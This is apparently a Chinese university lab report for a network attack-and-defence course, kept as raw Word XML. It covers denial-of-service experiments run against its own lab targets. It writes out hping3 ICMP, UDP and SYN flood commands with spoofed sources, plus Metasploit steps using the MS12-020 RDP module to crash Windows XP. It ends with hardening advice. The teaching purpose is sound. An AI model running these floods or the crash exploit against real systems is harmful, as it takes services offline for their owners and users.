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E19FB">
      <w:pPr>
        <w:jc w:val="center"/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福建</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>理工大学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>计算机科学与数学学院</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B36F58">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts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32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9D2DF0">
      <w:pPr>
        <w:wordWrap w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/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szCs w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">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4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ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>–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5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</w:rPr>
        <w:t>学年第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1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>学期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1539"/>
        <w:gridCol w:w="668"/>
        <w:gridCol w:w="1942"/>
        <w:gridCol w:w="473"/>
        <w:gridCol w:w="1326"/>
        <w:gridCol w:w="567"/>
        <w:gridCol w:w="901"/>
      </w:tblGrid>
      <w:tr w14:paraId="0B908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06" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C8B27B7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1539" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55D94C6C">
            <w:pPr>
              <w:keepLines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网络攻防技术</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="668" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5D401009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1942" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0B4B0E5D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>网络空间安全22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="473" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7D1A8FA4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1326" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="31242555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3220812128</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="48E7B055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901" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4EBDB0E0">
            <w:pPr>
              <w:keepLines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章百琪</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="6FAAA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06" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="084DBD2A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实验名称</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2207" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E052F2E">
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="240" w:lineRule="exact"/>
              <w:rPr>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文新魏" w:hAnsi="华文新魏" w:eastAsia="华文新魏" w:cs="华文新魏"/>
                <w:b/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>实验</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="华文新魏" w:hAnsi="华文新魏" w:eastAsia="华文新魏" w:cs="华文新魏"/>
                <w:b/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>三 拒绝服务攻击实验</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1942" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01285A95">
            <w:pPr>
              <w:keepLines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3267" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="118D3D86">
            <w:pPr>
              <w:keepLines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 xml:space="preserve">实验日期：        </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F74CE48">
            <w:pPr>
              <w:keepLines/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>提交日期：</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="29404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22689547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实验目的</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="508EF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</w:tcPr>
          <w:p w14:paraId="639972D4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1、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>掌握</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>icmp、udp、syn等flood攻击方法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34D18036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2、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>掌握拒绝服务攻击的操作流程与模块使用。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72CA039E">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>3、</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>学习拒绝服务攻击的防护和漏洞修复方法。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="421E7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6A422FC2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实验环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0981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8522" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A24DA5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渗透环境：Kali Linux ，配置网络为 NAT 模式。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B5783D8">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>靶机环境：linux，Windows xp sp1，配置 NAT 网络。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1AE4B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7F29285D">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>实验工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7F372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8"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="219A1F5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hping3、msf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20F5B8E8"/>
          <w:p w14:paraId="2019A400"/>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="67591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50C3D442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实验内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3FCA5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5" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="550AD2E7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1、网络层的拒绝服务攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="099B8F79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位于网络层的协议包括ARP、IP和ICMP等，其中ICMP主要用于在主机、路由器之间传递控制消息。目标主机处理这个请求和应答是要消耗CPU资源的，处理大量ICMP请求，就会消耗更多CPU资源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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="750BFDC3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下面构造一次基于ICMP的拒绝服务攻击。在Kali中打开一个终端，对目标主机进行icmp flood攻击，输入如下命令：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="437F46F9">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN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7F7F7"/>
              </w:rPr>
              <w:t># hping3 -q --rand-source --id 0 --icmp -d 56 --flood 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>216</w:t>
            </w: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7F7F7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F3D6A98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其中-q 表示静默模式，不显示接收和发送的数据包； --rand-source 表示伪造随机的源地址； --id 0 表示有ICMP应答请求（就是我们平时执行ping命令时的数据包）；-d 56表示数据包的大小（56是执行ping命令时数据包的大小）； --flood表示尽可能快地发送数据包。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可以使用hping3 --help命令查看参数说明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）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE02A1E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这种攻击产生的数据包的速度非常快，我们使用Ctrl+C组合键能结束这个过程。可以看到在短短的几秒内，就已经产生了上百万个ICMP数据包，如下图所示：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ABA4744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在被攻击主机上使用任务管理器查看网络流量情况。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DEA1A77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drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3886200" cy="4048125"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5715"/>
                  <wp:docPr id="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404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427467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可以使用不同的-d 参数，选择不同的包大小观察变化情况。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B7F771D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2、传输层的拒绝服务攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33C84101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利用hping3的来构造一次基于UDP的拒绝服务攻击。在Kali中打开一个终端，然后在终端中输入如下命令即可开始攻击：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="432AB2AA"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7F7F7"/>
              </w:rPr>
              <w:t>hping3 -q -n -a 10.0.0.1 --udp -s 53 --keep -p 68 --flood 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>216</w:t>
            </w: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7F7F7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D485F34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如果目标主机端口没有开放，对性能影响不大。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D3633F9">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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17233F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17233F"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>TCP的拒绝服务攻击实现相对容易，可以针对linux的22号端口实施。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69F922D2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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17233F"/>
                <w:spacing w:val="0"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:shd w:val="clear" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>利用hping3构造一次基于TCP的拒绝服务攻击。在Kali终端中输入如下命令：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4252F425">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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7F7F7"/>
              </w:rPr>
              <w:t>hping3 -q -n -a 10.0.0.1 -S -s 53 --keep -p 22 --flood 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>216</w:t>
            </w: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7F7F7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BAD7A5F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在linux系统上可以使用top命令查看CPU、内存使用情况，可以观察攻击前后的变化。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08463B2A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3、应用层的拒绝服务攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C860660">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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MS12_020系统漏洞利用与加固</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40606BE2">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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MS12-020漏洞是微软在12年发布的一个windows系统漏洞，该漏洞针对于windows xp和windows sever 2003等系统。攻击者通过该漏洞对目标主机进行攻击，可导致目标主机蓝屏。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="079FD19D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在kali的命令提示符，输入msf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查找metasploit framework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，通过search+漏洞编号查看可用的漏洞模块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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F2DEC08">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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漏洞探查：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E4A235E">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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7F7F7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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;search ms12_020</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE6EFA8">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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7F7F7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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;use auxiliary/scanner/rdp/ms12_020_check    侦察</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BC50781">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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7F7F7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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;show options                                   显示参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7719F20D">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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7F7F7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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;set RHOSTS 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>216</w:t>
            </w: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7F7F7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
            <w:r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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">                    设置参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51B79481">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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7F7F7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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;run                                              执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05EA27E9">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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漏洞利用：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29909502">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/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7F7F7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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">&gt;use 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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>auxiliary/dos/windows/rdp/ms12_020_maxchannelids</w:t>
            </w:r>
            <w:r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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">    利用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7A62B82C">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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7F7F7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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;show options                                                显示参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F57D645">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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7F7F7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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;set RHOSTS 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>216</w:t>
            </w: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7F7F7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
            <w:r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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve">                                 设置参数</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72888D88">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto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7F7F7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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>&gt;exploit                                                       执行</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="609798EF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攻击后可看到目标机蓝屏，重启</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D690F8C">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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4041775" cy="3739515"/>
                  <wp:effectExtent l="0" t="0" r="12065" b="9525"/>
                  <wp:docPr id="2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1775" cy="3739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64D485">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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4、漏洞加固</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="154F16EA">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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）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对服务进行加固，关闭windows系统中的远程桌面协议（Remote Desktop Services、Terminal Services、Remote Assistance服务）实现加固。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F998B3F">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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）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安装对应系统漏洞补丁。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="192D2CD0">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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</w:p>
          <w:p w14:paraId="03841C5C"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br w:type="page"/>
            </w:r>
          </w:p>
          <w:p w14:paraId="3F865C68"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附件：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 xml:space="preserve">hping3 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帮助</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1372C1AC">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5270500" cy="3316605"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
                  <wp:docPr id="1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3316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2E3AAF">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5272405" cy="1539875"/>
                  <wp:effectExtent l="0" t="0" r="635" b="14605"/>
                  <wp:docPr id="1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153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9B1605">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5269230" cy="2965450"/>
                  <wp:effectExtent l="0" t="0" r="3810" b="6350"/>
                  <wp:docPr id="1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96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E7F55A">
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="5273675" cy="3895725"/>
                  <wp:effectExtent l="0" t="0" r="14605" b="5715"/>
                  <wp:docPr id="2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3895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278E0B"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1135" cy="2590800"/>
                  <wp:effectExtent l="0" t="0" r="1905" b="0"/>
                  <wp:docPr id="2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259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16A443">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:hint="default"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="0" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="0"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="04A9A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5FED3053">
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="21"/>
                <w:lang w:val="en-GB"/>
              </w:rPr>
              <w:t>实验结果及分析</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>（含过程）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="31611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5" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
            <w:gridSpan w:val="8"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BF9FD8F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1、网络层的拒绝服务攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="219DC112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位于网络层的协议包括ARP、IP和ICMP等，其中ICMP主要用于在主机、路由器之间传递控制消息。目标主机处理这个请求和应答是要消耗CPU资源的，处理大量ICMP请求，就会消耗更多CPU资源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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3136A2C1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下面构造一次基于ICMP的拒绝服务攻击。在Kali中打开一个终端，对目标主机进行icmp flood攻击，输入如下命令：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5EE8F19B">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN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7F7F7"/>
              </w:rPr>
              <w:t># hping3 -q --rand-source --id 0 --icmp -d 56 --flood 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>216</w:t>
            </w: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7F7F7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="325FF4E7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其中-q 表示静默模式，不显示接收和发送的数据包； --rand-source 表示伪造随机的源地址； --id 0 表示有ICMP应答请求（就是我们平时执行ping命令时的数据包）；-d 56表示数据包的大小（56是执行ping命令时数据包的大小）； --flood表示尽可能快地发送数据包。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可以使用hping3 --help命令查看参数说明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）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4278B3E3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这种攻击产生的数据包的速度非常快，我们使用Ctrl+C组合键能结束这个过程。可以看到在短短的几秒内，就已经产生了上百万个ICMP数据包，如下图所示：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C282C8E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在被攻击主机上使用任务管理器查看网络流量情况。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A84C2E3">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3448050" cy="3492500"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="12700"/>
                  <wp:docPr id="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34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1D8CCF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可以使用不同的-d 参数，选择不同的包大小观察变化情况。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F130BE9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使用最大传输字节1480</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DFB53CB">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule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3403600" cy="3536950"/>
                  <wp:effectExtent l="0" t="0" r="10160" b="13970"/>
                  <wp:docPr id="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3600" cy="3536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D1D2B7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2、传输层的拒绝服务攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BBB4D43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利用hping3的来构造一次基于UDP的拒绝服务攻击。在Kali中打开一个终端，然后在终端中输入如下命令即可开始攻击：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72C4069B"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7F7F7"/>
              </w:rPr>
              <w:t>hping3 -q -n -a 10.0.0.1 --udp -s 53 --keep -p 68 --flood 192.168.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>216</w:t>
            </w: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7F7F7"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体" w:cs="Consolas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7F7F7"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
              <w:t>135</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1450FCEE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如果目标主机端口没有开放，对性能影响不大。</w:t>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300">
                  <wp:extent cx="3448050" cy="3492500"/>
                  <wp:effectExtent l="0" t="0" r="11430" b="12700"/>
                  <wp:docPr id="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34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D19B67">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:hint="default" w:ascii="Helvetica" w:hAnsi="Helvetica" w:eastAsia="宋体" w:cs="Helvetica"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
